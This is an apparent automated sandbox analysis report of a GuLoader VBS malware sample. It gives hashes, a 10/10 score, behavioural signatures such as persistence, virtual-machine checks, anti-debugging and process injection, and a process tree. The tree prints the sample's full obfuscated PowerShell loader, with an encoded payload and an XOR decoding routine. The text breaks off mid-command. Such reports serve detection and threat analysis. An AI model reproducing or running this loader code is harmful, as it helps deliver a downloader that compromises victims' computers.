Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
-
submitted
16/03/2023, 07:27
General
-
Target
f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs
-
Size
1.5MB
-
MD5
d432507a249248cf6a2518b733d86eed
-
SHA1
3619c2d2075b8e8f7f5d2592570acbedd08ee572
-
SHA256
f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02
-
SHA512
6df2a45c4fad337f5064a02f58b1648d38aa7381fad6d930b9237a9e5f83956b3330c4fabaf023fa85c29a45a2285823ce0c11a9de01826fd743f99786f0f833
-
SSDEEP
24576:ujEdPGRMK/6avBiw2OuR+9BxV6lcgQ1QRbAGw:8FRMCieuR+nb9N
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unacknowledgements = """ FFuInKc tAiMoFnU PSo lFyGg rBaDpBh i ctaWl lCyR0t A{ Q n pNabrAa m (U[HS t rMi n g ] `$gOMxPafm iCdS1Q0S4U) ; M`$ JLe r nEiGnAdPu sGtUr i e n s K=S NSeDwS- OSbKj e cCt HbEy tCe [P] C(S`$ O xSaHm iSdA1B0 4 .RLBe nKgStihM S/ H2F)G;u T M H cFWoArS(O`$ FOe npcIiSnNgHsS=l0P; `$HF eSnAcSi n g sE -El t `$ ODxPa mRipdR1 0A4F. LMeSn gVt h ;f T`$ FDe n cDiSnAgNs + =K2 )S{M F `$KU r oGc eVr i dGa eC =B C`$VOFxOaHm i d 1D0H4 .MSAufbSsNtDrDiHnDg ( `$ FPe nUcUi nBg sy,V O2F)D;l F e G A B C `$SJfe rAn idnFdmuLs tor i eFn sN[B`$ FAeEnAcLiKnEg sJ/A2C]P S=A R[ cPo nPv e r t ] :B: T o BPy t eU( `$KU rKo c e rsi dta eM,S M1U6 )B;B F `$UJ esrPn iPnId uIs t rHiLe n s [b`$TFFefnScCiHnEgSs /M2V] =P b(A`$mJ eBrOnSiUn dEuFsCt rGiSe nMs [R`$UF eSn c i nGgasA/K2 ] - b x o rV 2 4C7V)F;D U A L }B [SS t r iSnHgs]F[ SKyDs t e m .RT eFxCt . EVnKc oOdkiSnUg ] :D: ADSpC IrIA. G e tJS t roisnSgS( `$ Jae r n iBn d uOsTtUrLiOe nUsO)s;R}T`$ BKuBgsvSgBsT0I= P o lRy g raaFpHh iDc aSlTlOyF0F 'TAI4 8tEZ8I4 8 3E9A2D9IA D 9 9 3 9HBv9RBP'k;A`$KBFuSg v gKsA1U= P oMl y g r a p h iMcOa l lDys0 'OBAAK9EEd9H4 8 5B9 8 8 4 9 8S9 1H8D3AD 9SAG0S9OE 9K9 CS4RCD5 DP9PAB2 9S9T8S4b9 6 9H1W9H2AB 9 9R6 8 3N9 EF8D1F9 2MBLAE9 2K8r3 9 Ff9 8E9K3C8P4 'C;C`$KBVu g v gfs 2t=SP o lSy g r afpHhriScFaBl lPyS0 'RB 0R9s2P8T3 AA7P8 5B9 8C9u4PB 6 9F3 9R3A8S5 9 2S8R4F8 4 'Q; `$ BGuPgSvMg s 3K=UP oDlPyFgBr aNpMhUiLcSaRl lGy 0 B'SA 4 8TES8P4I8 3 9B2E9 A DP9 AF5B8 2A9 9S8 3G9UE 9 AR9 2EDS9 B E 9B9S8 3 9 2Q8S5D9B8 8M7PAT4 9S2B8R5B8F1 9 EV9T4 9U2F8L4KDs9RBUFJ9K6 9 9 9B3B9YBL9 2AAH5 9 2I9 1F'v;u`$ B uIg vMgPs 4P=SP o lGyTgBr aUpUhFiUcOaOlTlByg0V ' 8R4V8D3B8F5A9 E 9 9 9S0M' ; `$ B u g vMgVs 5 =SPCo l yGgPriaKpBhSi c aAl lLy 0a B'ABP0S9P2I8A3SB A 9S8 9S3A8V2A9 BE9G2 B FA9S6 9b9 9 3 9 BR9T2U'P; `$IB utg vNgMs 6 =CPOoKl y gPr aPp hFi cAa lAlSy 0 'LA 5KAP3 AA4K8 7U9C2 9B4C9 ES9m6B9DB B 9W9 6 9IAU9N2 DVBND 7GBnFB9PE 9 3d9O2 B 5 8 ETAb4 9sEA9 0 DOBGD 7KAS7T8L2L9 5I9 BF9KE 9 4F' ;G`$SB uFgSv g sK7 =CP o lSyRg r a p hTiScSa lOlVy 0M O'UA 5U8D2 9F9 8 3 9 ES9CA 9A2EDAB D 7IB A 9 6I9 9 9S6 9P0U9 2U9F3K' ; `$OB u gAv gGs 8 =DP o l yMg r adp hPi c a ltl yD0S L'PA 5P9J2S9 1U9 B 9S2A9R4S8 3 9I2Q9R3SBR3O9 2T9NB 9B2 9W0 9R6 8 3 9S2f'B;C`$ B uAg v gFsb9 = P o lSy g rSa pRh igcSaTlNl y 0i C' BUED9A9BBIAK9 2 9rA 9 8r8L5S8BE B A 9G8U9P3 8 2S9BB 9A2 'S; `$ SLlDaSmtb aFdTeMsR0D= P oLlPy g r a pVhPiEcNa lSl y 0D 'SBCAB8 EPB 3V9u2D9TB 9 2Z9R0 9 6 8M3 9w2 AA3M8TE 8 7C9 2A' ;D`$ S lOaOm b aSdFeTsS1 = PUoAlTyDg r aSpShUiScGa lSl y 0 R'FB 4R9TBS9R6E8 4 8S4 DBB DM7RAP7 8 2 9S5R9PB 9 E 9S4PD BCDw7SA 4B9P2 9O6h9IBB9S2c9 3MDFB DB7RBM6 9 9 8U4B9FECB 4C9LB 9 6B8 4P8S4 DPBSD 7OBN6C8D2 8F3K9N8UB 4 9EBP9N6 8 4 8 4O' ; `$ S l aRmMbcaUd e sC2U=NP oIlBySgBr aLpMh iScmaMlSl yT0 C' BKEP9T9 8B1P9S8H9 C 9S2 'K;A`$AS l aKmDb aSd e sU3 = P oNlOySgAr a pchEi cEa lSlPy 0B S' AS7U8W2b9D5P9aBU9 EF9B4AD BTD 7GBTFI9FER9 3A9s2cBA5 8TE A 4T9 E 9O0 D BSD 7 BL9p9D2 8K0 A 4 9TBT9A8P8B3UD B D 7 AD1 9 EC8A5I8T3X8S2P9T6 9 B ' ;I`$ STl aImFb a dEepsA4 =FP oSlGy g r aMp hRiPc aMl lByE0B 'wA 1 9FES8S5S8 3M8E2L9 6S9 B B 6 9 BB9 B 9B8R9 4M'H;P`$ S lLaDmCbia d eVsR5 =VP o lryMgMrSaMpPh iAcPa lAl y 0S t' 9k9 8P3M9S3 9 BA9SBB'S;A`$TS lSa m b a d e sV6A=EPUoWlUyMg r a pIhAiScTa l lSy 0A B'IBP9 8U3 AP7V8I5A9 8 8M3 9 2 9k4 8 3DAT1 9TE 8 5D8 3b8r2h9 6 9 B B AU9R2 9RAB9 8E8H5M8 ES' ; `$IS l aAm b aidSeRsD7P= PPoOlCy g rBaRpSh i c aklBl yS0 A'LBIEOB 2VA FK'D; `$GS l aBmAbAahdOePsT8 =CP oSlUyOg r a p hCi cBa l lSyA0a ' AdBB' ;L`$VNFo n dJebsktgr uBcdtWi o n = P oUl y gerRa p h iIcNaBl l yu0 P'DAu2hAb4 BK2UAp5SCH4LCC5 ' ; `$ P o l i tAiRaUkStAiRo nGePr = P oTlSyIgPr aNp h iLc a lPlByE0 G'pBD4 9L6 9 BT9 B AH0O9 Ec9H9P9S3B9A8 8c0FA 7E8 5 9C8D9 4MBF6P'p;mf uSnScTtMiAo n FfUk ps b{ P aSrOaUm T( `$IB e tKaCgVe dSe sO,i `$ J oNnPaMt abnW)S A R d ; `$MR e t tSiPgphAeSdHs t aPbAsB0P =BPVoSl yUgFrEa p hVi cRaTlPl yR0 V'sDB3 B FS9V2F9 9u8T0 9CE 8 4 9 2 D 7 C A DN7SD F A C BS6U8A7 8R7CB 3S9S8 9 Ar9F6L9 EV9I9 A A CUD CHD BV4 8 2F8M5 8B5 9 2 9 9 8U3 B 3I9F8F9PAd9P6S9AE 9P9 DG9UBS0R9C2P8u3OB 6H8B4 8S4S9 2O9 A 9S5 9 BF9 EP9 2H8 4sDAF D EEDA7A8WBID 7 A 0E9WF 9 2c8V5 9C2ADMAdB 8D9H5 9GDI9K2S9B4S8 3TDS7b8SCAD 7ADI3 A 8 D 9aBM0P9ABS9G8L9 5 9n6 9PB BN6 8S4K8 4G9 2 9NA 9M5G9IBf8NECBB4F9C6c9S4E9TFH9T2PDS7DD A BA6 9 9 9S3SDR7GD 3JA 8 D 9DBFB 9 8S9O4S9 6H8 3 9TEK9U8 9 9 DW9AAM4S8 7O9dBM9RE 8 3DD F DH3uA 4 9PB 9K6O9 AO9K5P9G6K9 3 9O2E8 4DC F D EUAMC D AHCD6 A A D 9sBP2 8F6D8 2 9V6P9 BP8 4 DeF D 3 B 5 8 2 9B0 8B1 9O0 8G4 C 7SD EBDP7 8AAODSE D 9 BG0 9 2 8C3 AZ3V8AE 8A7I9P2SDHFPDF3CB 5T8P2 9a0L8S1 9 0 8 4MCF6TDVEC'B;S&e(U`$HSAlHa mFb aSdme s 7R)A `$RRNe t t iMgMhNe d sPt a b s 0 ;S`$LRDe tSt iEgshOerd sUt aUb sC5E H=R TPSoUlJyBg rbaApUh ifc aSl lMy 0P 'ODS3 B 0L9TBU9C6 8 4E8B5t9I8 9 2B8R5gD 7 CkAND 7 DG3 BJF 9 2M9B9E8M0B9GES8 4F9 2SDF9rB 0 9F2 8C3kB AW9P2P8 3J9DFg9 8U9T3BDEF DS3MBT5 8P2U9S0 8S1 9 0 8E4 C 5AD BMDP7TABCTA 3 8PEB8 7 9 2 A COA AVAWAWD 7FBS7QD F D 3TBS5h8f2D9S0 8 1 9 0 8D4PCa4WDUBPDP7 D 3GB 5 8S2B9 0 8 1K9r0 8 4SC 3vD E DAEH' ;s&P(O`$DSSl aDmmbAaDd e se7D)m T`$YRme t tLiRgMh e d s t a bMs 5P; `$ RpeAt t iGgCh e d sjtIaIbHs 1 =S BPFoRlEy gbr aipphbiSc a lBl y 0S 'K8C5 9 2 8W3Z8 2S8 5 9C9 D 7 DL3 B 0 9SB 9 6E8 4 8M5 9D8D9D2 8 5UD 9YBFES9R9S8 1T9 8T9UCI9M2RDTF D 3 9 9M8B2 9BB 9UB D BsD 7BB 7 DKF A CJAP4H8 Et8U4C8S3M9R2 9 ASDt9RAS5U8A2 9 9 8 3E9FEI9RAP9M2ADS9AB ED9T9F8S3I9v2r8D5P9N8 8k7AAa4C9s2H8P5s8 1p9PE 9D4g9 2C8R4LD 9 BCFi9 6S9N9R9T3 9LB 9H2 AT5 9O2L9E1UAHAFDBF B 9 9A2S8U0GDTA BC8T9 5 9WD 9 2U9 4S8 3 DD7EAL4 8AER8 4 8 3P9 2U9NA DK9 A 5u8 2 9G9 8V3C9SEB9 AU9 2SDS9 BDED9 9 8E3 9 2U8T5 9 8S8T7SAh4 9 2E8M5 8 1 9 EK9 4 9T2P8 4LDG9 BKFM9L6H9S9F9 3b9UBN9U2SAS5 9 2C9I1 DUFLDSFKBT9H9 2G8K0 DSAHB 8N9F5M9LDR9A2 9u4E8M3DD 7DBIE 9 9L8 3RA 7R8C3D8S5FDCE DIB DU7MDSF DA3 B Fl9 2S9 9 8 0F9 EG8J4 9N2BD 9 B 0 9K2D8i3 B A 9D2U8A3 9TF 9R8S9O3 DTFGD 3 B 5 8 2S9M0G8 1P9P0M8 4PCD2 DPESD ESD 9hB ET9T9P8 1 9S8 9 C 9 2KD F D 3 9F9 8A2F9 BS9HBDD BPDT7 B 7 DRF D 3BBT5M9L2 8U3P9F6 9t0D9B2 9 3N9F2P8 4PDTElDBECDCE D EED BKD 7EDA3RBPD 9 8B9F9T9 6G8 3p9 6P9 9uDSE DCE ' ;l& (i`$DSClSa m bLaEd e s 7 )H F`$CR eRtUtMiPg hFeSdKs tBaSb s 1B;S}Nf uEnFc tRiUoHn UGFD TS M{CPia rKaTm (E[ P a r a m eFtHe r ( PDo s iBtoiPo n H=S L0 , MHaUnRdDa tNoarTyP F=L U`$ T r u e ) ] [FTKy pDeD[o]P] `$ATUr i p yFrdeLnBoGu s ,P[PPVa rSaBm eFtSeWrR(HP oas iBtPiMo n =G B1R)S]F E[CTAy pAeT]L B`$ J a gBt fKaHlVk e nSelsZ =L [ VAoMildU] )F; `$ R e t tSiNg hNebd s t aFb s 2A =S PPOo lBy g r a pjhCiVcKa l l yB0 S' DT3 BC9A9 6T8 3P8 2S8 5E9IB 9BES9 0 9AFE9 2U9 3S9B2E8 5GDB7MCBA D 7DAFCFBJ6R8t7 8t7SB 3S9U8 9wAm9 6S9 EI9 9IA A CFD C DBB 4F8C2 8U5 8O5 9 2 9L9 8 3aBG3 9 8U9 AP9T6V9bEO9R9 DN9 Bs3C9K2C9O1 9 Ef9 9S9C2CB 3M8 EM9S9 9O6 9PAA9 EH9F4 BA6C8F4 8M4S9 2A9PA 9r5Y9MBP8 ESD FADRF B 9T9S2 8t0 DCA BF8 9T5O9FD 9B2 9 4W8 3iDF7SA 4u8FE 8p4A8O3i9s2 9GA D 9DA 5S9 2 9C1P9TBP9 2r9M4C8H3Z9 ES9B8G9f9EDU9SB 6 8 4 8U4 9N2L9HA 9 5N9 BO8SE BS9A9P6P9BA 9S2GDCFCDF3 BH5 8 2 9U0D8C1O9C0K8 4BCFFBDDEIDPE D BNDK7UA CtA 4 8VE 8S4T8 3F9 2 9 A DI9JAs5N9S2A9 1a9SB 9 2 9 4M8A3S9HE 9B8H9 9TDR9 BH2 9TA 9zET8 3 D 9OB 6M8D4 8 4 9m2 9 Aa9k5 9aBD8FE BH5 8o2 9 EB9 BS9E3 9M2 8 5sB 6G9 4k9L4S9 2M8C4M8F4 AUAtCYDFC D A 5C8H2G9S9UDSEOD 9 BM3 9 2 9l1 9 E 9 9F9 2 BK3 8PEv9 9 9 6G9DAV9OE 9S4 B AU9 8U9B3B8 2O9 B 9 2 DRFVDS3 Bc5 8 2P9B0 8 1O9 0 8C4 C EHDSB D 7MDS3 9S1 9 6 9IB 8E4 9 2 DPEAD 9LB 3S9 2O9 1 9 ED9 9 9v2CA 3 8 E 8 7H9U2 D FSD 3TA 4M9 B 9T6 9FAF9D5 9L6B9R3 9 2U8S4UC 7TDIB DG7BDO3SA 4 9PBI9S6I9 AF9D5 9 6 9 3C9 2 8 4 C 6SDFBCDS7 A CsA 4O8CE 8G4 8H3 9 2F9TA D 9 BRA 8 2 9 BA8O3R9NE 9P4 9 6 8D4 8I3 Bc3 9 2 9 B 9 2 9I0p9r6 8U3 9U2BA APDhEP' ;L& (F`$ S lMaTm b aed e sA7 )M `$SRBe ttt iNgMhPe d sLtUaFbFsD2D; `$IRVeUt t ihg hIe dFsDt a b s 3O =S PFoSl y g rIa pDhOi cAa lGlSyK0 'SD 3 BH9 9W6 8A3O8 2 8A5 9NB 9EE 9 0B9FF 9 2H9o3 9L2K8i5 DS9AB 3c9A2 9F1R9 ES9 9 9 2PBb4A9 8D9T9F8P4M8 3T8H5 8P2H9D4 8M3 9U8t8 5 D FKD 3 BS5I8K2I9B0E8 1A9S0 8 4 CF1EDBBIDR7SAIC AT4R8EEO8A4 8L3d9Z2 9SAVD 9 AE5B9 2 9 1S9FBR9B2 9V4I8 3L9 ED9S8 9T9BD 9 BC4 9 6 9SB 9 BP9NEU9a9 9 0 BO4 9 8R9 9G8F1 9r2 9B9A8F3N9GE 9K8 9P9 8 4DA AFCGDMC DCA 4 8 3A9A6A9 9 9 3D9 6K8T5 9 3ED BFDM7 DE3TA 3M8O5O9AES8G7S8REK8 5R9D2 9N9C9P8 8N2M8 4HDDEgD 9 A 4w9 2S8M3 BPER9 AT8R7S9KB 9 2v9cA 9T2B9 9 8F3J9n6 8P3D9AEO9 8 9P9KB 1n9uBU9 6J9F0 8 4 DRF Dp3CBF5p8 2G9 0B8 1R9P0B8 4OC 0 DlEA'I; & (L`$ S lHaSm b aEdFeRs 7 ) `$ RFeCt t iKg hMeTdUs t aSbSs 3U;O`$AR e t tTiRghh eOd spt aGbTs 4H = PKo lLymgTr aMp hSiTc aTl l yD0L G' D 3FBR9 9N6S8 3S8B2K8S5U9uBJ9AEP9 0S9 FI9 2 9 3T9c2B8 5SDS9 B 3U9 2C9W1O9NEU9b9C9 2MBsA 9 2E8 3A9BFD9 8T9 3KD F D 3 A 4U9 B 9S6F9BAc9 5Y9S6K9 3F9K2S8 4 C 5ID BKD 7 DN3AA 4T9 BB9U6I9 AM9D5 9C6B9D3R9R2A8 4 CK4VDEBSD 7MDg3EBEDG9 6 9S0 8 3N9 1 9 6T9LB 9 CM9H2P9D9 9U2f8 4 D BcD 7CDV3 A 3 8E5D9 EG8Z7D8dE 8 5 9 2T9 9 9B8M8F2g8 4 D ECDK9RA 4L9T2N8D3DBFE 9 AP8D7N9BBK9P2O9PAH9 2E9S9F8 3D9P6T8e3 9gE 9 8K9K9 B 1D9NB 9A6D9L0A8S4FDPFTDS3OBS5Z8D2F9N0 8P1 9 0M8S4 CH0PDTEm'S;F&I( `$cSRlPaPmSb aSd eRsF7A)Q t`$IRSeWtSt iLgDh e dSs t aPb sH4 ;K`$DRSeUt tCiRg hKePdpsPtKa bnsW5 =a TPFoAlSy gDrFaCpDhRikcDa l l y 0E o' 8M5 9N2S8 3 8E2M8S5 9t9VD 7RD 3HBA9A9 6U8 3K8 2G8 5S9 B 9OE 9U0M9EF 9 2 9c3F9C2S8P5BD 9 BR4 8e5 9 2p9 6B8V3 9G2KAB3J8sES8 7B9 2 D FKDUE 'C; &R(H`$ SOlUa mabMa dGeCs 7R)F T`$MRHe t t i g hSeBdEsUtpaGbssP5 K H;u} `$ P aVnBtSe f o r sPk rCiIvDn iAnAg sO E=F BP oAlSyHgDr aUpSh iKcvaClil yD0B 'G9CCB9H2 8 5t9 9e9D2N9VB CL4DCO5Z' ;W`$KR eRtOtFi g hpeFdGsTtsaObUs 6 = P oPlUyOg rTaSp hBi c aUl l yE0 C' Dh3KASE 8 1S9T8 9 9 9 9 9V6DDt7FCCABDH7 A CSA 4 8 EA8 4F8C3 9h2 9FA DS9HAU5s8 2 9 9 8S3 9FEp9FA 9 2ADD9SBNEs9B9O8 3I9E2B8C5T9T8 8E7PA 4 9M2M8B5K8 1 9 EG9U4A9 2S8P4RDV9 B AF9 6h8s5 8M4H9AFU9 6 9 BCABAACLDOCUD BP0A9F2L8R3HBH3B9G2F9 BD9 2 9A0K9S6M8N3s9 2TB 1 9 8v8 5 B 1D8 2A9S9E9H4C8E3 9 E 9A8t9 9DAP7h9U8 9 EB9 9 8A3A9P2S8s5BDKF DCFU9J1 9WCI8P7 DC7FDB3 A 7B9F6P9 9S8E3 9B2R9S1 9s8I8N5U8 4T9BCS8 5l9 EE8A1T9 9 9FEU9 9F9 0T8 4 D 7ADS3TAD4 9 BF9E6D9 AS9F5L9 6 9G3D9O2c8 4 CB3 D E DSBRDA7 D FPBT0HBF3 AD3SD 7 B 7 DmFSA CPBRED9G9E8F3 AB7E8B3T8 5 ASADDRBPD 7EA C AP2 BBE 9 9R8 3pCM4ACA5UANA DDBODL7FA C AU2MBOER9L9 8 3TCN4pCM5MA A D BKD 7 A C A 2CBKEB9 9E8E3FCL4 CC5AA AAD EADO7 D F A CSBRE 9B9F8G3FA 7 8M3D8L5NAPA D ENDIE DOE 'C; & (S`$ S lPa mPbCaodSeJs 7f) s`$LRKeEt tUiSgFhDeSd s tEaRb sT6S;e`$SSae mSilfOo rSm eSdG B=U fekBpM P`$TSTlbaGm b aUd e sU5E P`$ SEl a m bAahdce s 6 ;D`$SR eAtDtSiLg h e d s tSa b s 7F = BP oPlIy gGrLaHpnh i cSaAl lQyA0O 'SDU3TA 2 9E3 8 3 8 5 8UEC9LCC8 4G9K1C9S8 8B5N9SAP9 2 8L4SC 4bDA7 C A Df7 D 3EA Eh8 1S9H8T9E9I9N9 9L6 D 9AB EC9A9 8S1G9 8S9OCS9M2UDUFAA CTB EB9 9P8L3 AV7P8R3 8r5 AhA C D C D AADF9O2 8 5G9T8 D B DU7CCA1 C 3 CD2ND BUDI7 C 7 8KFTCC4CCC7HCE7GC 7UD BLD 7 CA7B8 FSCH3 Cp7FDEEM'A;A& ( `$MSAlMaPmMbSa dle s 7 ) S`$MRPeMtStKiUg hFeBd sSt aSbOsG7P;P`$ R eOt tCi gBhMe d s t aDb sG8I = DP oRl yTg r aMpyhKi c aNl lFy 0 U'OD 3WBP6 9 9T8 3G9 ET9M5N9 E 9S8G8U3V9 E 9MCA9D6S8 4 DF7jCBAGDA7UDK3 ASEI8T1L9C8O9 9 9 9A9O6UDS9UB E 9f9O8S1A9 8 9 CF9s2 DBF A C BBES9S9A8 3MA 7 8A3p8L5TARAJC D C DRARDr9 2A8 5 9P8 DBBGDV7 CRFDCM0RCU6 C 2 C 3FCF1GCHF C FMDuBFD 7 CG7D8 FSCA4 Ct7bCD7BC 7 D BMDr7 C 7M8NFKC 3 D EU'P;b&H( `$KSalka m bVa dAe sN7R)F `$BRReWtmt iPgNhMe dPsMt a bWsT8C; `$KUKd tSr yFkTsPfSoSrAm e sT0H0U=G' HUK CPUH:B\ SLogrAoIs pGh eFrGe \ LHa bNoCr aSnNt emrDs ' ; `$ USdIt rlyWkRs fUoUrhmBeDsS0T1U s=DP oNl yRg rMa p h iPcSaSl l yM0 U'IDE3MBDB 9 EI9UB 9RD 9C6SCIAMD F B 0P9 2 8 3DD A BREp8C3S9P2 9AAmA 7H8 5D9F8 8R7 9g2S8 5V8 3r8HE DC7BDIASAw7V9C6 8 3P9OFFDL7BDc3 A 2 9T3S8 3K8S5 8 ES9PCE8e4 9 1K9M8 8 5 9 A 9F2K8 4CCL7 CF7EDFEAD 9TA 4S9 2B9ABS8a1 9 1R9PB 9 2E9EBR8R4 9F2i' ;H&E( `$iSRlLaTmCbFa deeJsi7 ) C`$ ULd tPr y k sPfSoPr maeAs 0H1 ; `$ RfeCtEtSiPgAhUeDdBsGt a b s 9K L= TPMo lEyNgCrpaFpLh i cAa lil y 0C B' D 3FAs5 9V2H8S3 8 3 9 E 9 0e9fFC9O2f9 3 8 4 8M3 9F6L9R5 8 4CDn7 C A D 7 A CVA 4U8 EM8P4 8F3 9S2B9 A D 9 BT4 9s8 9 9A8P1P9S2E8 5I8A3 AFAAC D CODSB 1 8 5 9 8 9OABBR5J9 6 8A4E9v2 C 1BCO3JAO4 8 3 8O5 9tEW9A9 9 0KD FMD 3CBRBD9MET9 BF9MDQ9 6GD E ' ;B&P(B`$ SNl a mHb a dGeCsI7F)S `$PRPeFt t i gshSeHdGs t aBb sT9r; `$ LUiSlAj a 0C = DPBo lGyPg rSa pTh i cda lLlSyU0D c' A COA 4 8 Eh8 4p8S3A9L2 9RA DB9SA 5 8S2 9 9 8o3S9MEO9KAH9 2ZDG9WB E 9 9K8 3M9 2t8o5 9D8T8S7 AU4M9P2S8 5 8N1H9DEV9K4 9S2F8E4TD 9TBFAP9 6S8T5 8 4T9 F 9S6S9 BMADAOCMD C D BR4 9S8 8H7g8 END FID 3 A 5W9L2a8 3T8 3 9CE 9 0A9TF 9 2C9U3 8I4 8 3 9 6R9 5L8A4XD BDD 7 C 7 DSBTD 7ODL7ADA3 AP2R9M3 8 3T8Z5 8DE 9 C 8 4 9 1 9E8G8P5A9 Ap9D2I8D4 CD4DDUBFDS7SC 1FCS3TC 2ID E ' ;I&L(U`$ S lCaLm b aBd eAsO7R)F H`$MLPi lLj a 0d;A`$ Muu hRa m eBdTaGnSe rLeFnI= `$ RueOtOtGiBgThee dPsBt aTbss . cKoCuRn tR- 6C4 5T;K`$OLsiDl j aS1 D=I P o lUyHgmr aHp h i cbablDlEy 0A 'OA CAAA4A8 ES8 4p8 3 9 2H9RAPDW9 Az5 8N2 9H9 8 3 9 EM9 AG9V2 DT9HB E 9 9F8P3 9C2 8 5S9H8D8 7BAM4R9I2 8 5 8 1V9 E 9I4T9k2 8H4 DK9hB AV9S6 8 5 8J4u9OFM9 6R9 BaA A CPDBCBD BI4r9 8 8 7S8BE DFFIDS3 AT5l9 2D8R3T8A3G9HE 9D0 9RFO9B2D9P3S8A4i8T3 9S6 9 5F8 4DD B D 7MCB1TC 3ACS2ND BdD 7 D 3PBW6 9P9 8 3C9 EC9A5T9 ET9 8D8 3 9 EF9 CM9J6 8S4 DNB DO7SDV3 BFA 8c2 9 FC9S6 9 Al9 2 9S3B9S6 9B9T9 2 8l5O9 2T9H9 D E 'S;A& ( `$HSUl aFm bFaCdDe sB7F) `$ LJi lCjGa 1P;F`$GL iUlRjBa 2 H=D OP oHlByKgkr a pAh iSc ablTl y 0 P' DT3SBS6G9ABA8S4D8H3a9U2B9 3 DO7OCFAAD 7BA CBAD4 8ME 8C4T8 3P9B2K9 A DT9TA 5H8R2 9C9 8P3K9 E 9RA 9A2zD 9 B E 9N9M8 3U9L2P8B5B9s8T8 7 A 4T9 2D8 5 8F1 9DEB9k4 9C2E8 4 D 9TB AC9 6H8T5A8G4u9DFS9 6 9UB A AMCND CNDFB 0O9 2A8A3 BA3M9 2 9 BS9K2 9 0B9B6p8a3S9M2SBF1 9S8 8 5 BN1 8M2D9F9 9 4n8N3E9aEI9A8S9F9HA 7 9D8B9SES9S9s8I3 9S2t8 5 DCF D FD9 1W9SCS8I7UD 7FD 3VBB9S9D8h9T9 9M3E9 2H8 4T8 3s8 5T8C2F9 4 8L3 9 ES9T8 9T9FDD7SDS3 AH7 9 8 9 BD9 EB8U3 9 EP9 6B9ICT8s3M9TE 9 8 9 9 9 2p8 5gDNEODBBSD 7 DPF B 0VBY3AAU3 D 7 B 7PDrFKAEC B EU9I9S8p3TA 7M8S3L8 5 A A D BwDN7SAWC BRE 9N9 8 3TAA7 8 3T8G5 AKAEDLBBDU7 AAC BRE 9 9P8g3 AD7C8m3R8 5RA AIDBB D 7 AUCABAEF9 9 8R3 A 7K8P3 8 5WA AKD B DP7IA CCBPEG9 9T8b3BAT7C8R3 8t5 A A D EDDD7SD FDAXCFBAEF9 9C8 3 AM7S8 3E8A5OA A DGE DFEHDDEE'S;R& (R`$ SVl a mFbCaSdAe s 7S) Z`$TL iAl jCaT2 ;H`$GLHiRl j a 3u =S VP o l y g rRa p hJi cPaCl lEyH0 c' DT3PB 6 9RB 8 4A8C3B9 2s9D3 D 9EB E 9P9P8 1B9 8L9FC 9C2FDAFFDE3SAS2 9 3 8u3 8F5G8IES9SCF8s4T9C1I9P8h8b5M9 AU9 2P8B4 C 4SD BmDb3 BS6F9S9F8U3B9AEg9R5P9 E 9U8F8S3 9TES9BCB9S6C8o4UDaB DG3OA 4T9O2L9 AU9 E 9B1K9P8G8S5K9tAS9E2 9 3 D B CI7BD BBCU7OD E 'C;M&B( `$ S l aMm bVaUdUeEsV7F)U `$ LEiHl j aa3 #C;""";;Function Lilja9 { param([String]$Oxamid104); For($Fencings=1; $Fencings -lt $Oxamid104.Length-1; $Fencings+=(1+1)){ $Polygraphically = $Polygraphically + $Oxamid104.Substring($Fencings, 1); } $Polygraphically;}$Acridophagus0 = Lilja9 ' K S K B P S R H A S L S P L S VIKE XP ';$Acridophagus1= Lilja9 $Unacknowledgements;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Acridophagus1 ;}else{.$Acridophagus0 $Acridophagus1;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Polygraphically0 { param([String]$Oxamid104); $Jernindustriens = New-Object byte[] ($Oxamid104.Length / 2); For($Fencings=0; $Fencings -lt $Oxamid104.Length; $Fencings+=2){ $Uroceridae = $Oxamid104.Substring($Fencings, 2); $Jernindustriens[$Fencings/2] = [convert]::ToByte($Uroceridae, 16); $Jernindustriens[$Fencings/2] = ($Jernindustriens[$Fencings/2] -bxor 247); } [String][System.Text.Encoding]::ASCII.GetString($Jernindustriens);}$Bugvgs0=Polygraphically0 